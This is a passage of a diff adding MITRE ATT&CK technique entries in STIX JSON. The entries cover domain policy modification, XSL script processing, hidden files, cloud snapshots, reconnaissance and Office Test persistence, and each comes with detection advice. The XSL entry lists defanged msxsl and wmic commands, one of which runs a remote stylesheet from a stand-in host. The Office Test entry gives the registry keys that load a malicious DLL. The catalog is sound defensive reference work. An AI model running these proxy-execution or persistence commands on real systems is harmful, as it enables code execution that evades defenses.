February 13, 2024.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update" + }, + { + "source_name": "TA571", + "description": "Axel F, Selena Larson. (2023, October 30). TA571 Delivers IcedID Forked Loader. Retrieved February 13, 2024.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader" + }, + { + "source_name": "mod_rewrite", + "description": "Bluescreenofjeff.com. (2015, April 12). Combatting Incident Responders with Apache mod_rewrite. Retrieved February 13, 2024.", + "url": "https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/" + }, + { + "source_name": "Browser-updates", + "description": "Dusty Miller. (2023, October 17). Are You Sure Your Browser is Up to Date? The Current Landscape of Fake Browser Updates . Retrieved February 13, 2024.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates" + }, + { + "source_name": "StarBlizzard", + "description": "Microsoft Threat Intelligence. (2023, December 7). Star Blizzard increases sophistication and evasion in ongoing attacks. Retrieved February 13, 2024.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/" + }, + { + "source_name": "QR-cofense", + "description": "Nathaniel Raymond. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved February 13, 2024.", + "url": "https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/" + }, + { + "source_name": "Schema-abuse", + "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved February 13, 2024.", + "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse" + }, + { + "source_name": "Orange Residential Proxies", + "description": "Orange Cyberdefense. (2024, March 14). Unveiling the depths of residential proxies providers. Retrieved April 11, 2024.", + "url": "https://www.orangecyberdefense.com/global/blog/research/residential-proxies" + }, + { + "source_name": "Facad1ng", + "description": "Spyboy. (2023). Facad1ng. Retrieved February 13, 2024.", + "url": "https://github.com/spyboy-productions/Facad1ng" + }, + { + "source_name": "sysdig", + "description": "Sysdig. (2023). Sysdig Global Cloud Threat Report. Retrieved March 1, 2024.", + "url": "https://sysdig.com/content/c/pf-2023-global-cloud-threat-report?x=u_WFRi&xs=524303#page=1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T04:27:31.884Z", + "name": "Domain or Tenant Policy Modification", + "description": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.\n\nModifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.\n\nWith sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include: \n\n* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)\n* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)\n\nAdversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Obsidian Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nConsider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "SaaS" + ], + "x_mitre_version": "3.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "System access controls", + "File system access controls" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "created": "2019-03-07T14:10:32.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1484", + "external_id": "T1484" + }, + { + "source_name": "CISA SolarWinds Cloud Detection", + "description": "CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa21-008a" + }, + { + "source_name": "ADSecurity GPO Persistence 2016", + "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", + "url": "https://adsecurity.org/?p=2716" + }, + { + "source_name": "Microsoft 365 Defender Solorigate", + "description": "Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/" + }, + { + "source_name": "Microsoft - Azure Sentinel ADFSDomainTrustMods", + "description": "Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.", + "url": "https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml" + }, + { + "source_name": "Microsoft - Update or Repair Federated domain", + "description": "Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.", + "url": "https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365" + }, + { + "source_name": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks", + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.", + "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + }, + { + "source_name": "Okta Cross-Tenant Impersonation 2023", + "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.", + "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + }, + { + "source_name": "Wald0 Guide to GPOs", + "description": "Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.", + "url": "https://wald0.com/?p=179" + }, + { + "source_name": "Harmj0y Abusing GPO Permissions", + "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.", + "url": "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" + }, + { + "source_name": "Sygnia Golden SAML", + "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", + "url": "https://www.sygnia.co/golden-saml-advisory" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "XSL Script Processing", + "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Avneet Singh", + "Casey Smith", + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Digital Certificate Validation", + "Application Control" + ], + "x_mitre_system_requirements": [ + "Microsoft Core XML Services (MSXML) or access to wmic.exe" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1220", + "external_id": "T1220" + }, + { + "source_name": "Reaqta MSXSL Spearphishing MAR 2018", + "description": "Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.", + "url": "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/" + }, + { + "source_name": "Twitter SquiblyTwo Detection APR 2018", + "description": "Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.", + "url": "https://twitter.com/dez_/status/986614411711442944" + }, + { + "source_name": "LOLBAS Wmic", + "description": "LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Wmic/" + }, + { + "source_name": "Microsoft msxsl.exe", + "description": "Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.", + "url": "https://www.microsoft.com/download/details.aspx?id=21714" + }, + { + "source_name": "Penetration Testing Lab MSXSL July 2017", + "description": "netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.", + "url": "https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/" + }, + { + "source_name": "XSL Bypass Mar 2019", + "description": "Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.", + "url": "https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75" + }, + { + "source_name": "Microsoft XSLT Script Mar 2017", + "description": "Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.", + "url": "https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Scan Databases", + "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", + "created": "2020-10-02T17:00:44.586Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1596/005", + "external_id": "T1596.005" + }, + { + "source_name": "Shodan", + "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020.", + "url": "https://shodan.io" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Hidden Files and Directories", + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "created": "2020-02-26T17:46:13.128Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/001", + "external_id": "T1564.001" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Create Snapshot", + "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", + "created": "2020-06-09T15:33:13.563Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/001", + "external_id": "T1578.001" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + }, + { + "source_name": "AWS Cloud Trail Backup API", + "description": "Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.", + "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html" + }, + { + "source_name": "Azure - Monitor Logs", + "description": "Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor" + }, + { + "source_name": "Cloud Audit Logs", + "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", + "url": "https://cloud.google.com/logging/docs/audit#admin-activity" + }, + { + "source_name": "GCP - Creating and Starting a VM", + "description": "Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.", + "url": "https://cloud.google.com/compute/docs/instances/create-start-instance#api_2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Determine Physical Locations", + "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", + "created": "2020-10-02T16:32:33.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1591/001", + "external_id": "T1591.001" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" + }, + { + "source_name": "SEC EDGAR Search", + "description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.", + "url": "https://www.sec.gov/edgar/search-and-access" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:41:55.175Z", + "name": "Office Test", + "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature, such as:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "created": "2019-11-07T19:44:04.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137/002", + "external_id": "T1137.002" + }, + { + "source_name": "Palo Alto Office Test Sofacy", + "description": "Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/" + }, + { + "source_name": "Hexacorn Office Test", + "description": "Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. Retrieved July 3, 2017.", + "url": "http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Develop Capabilities", + "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used 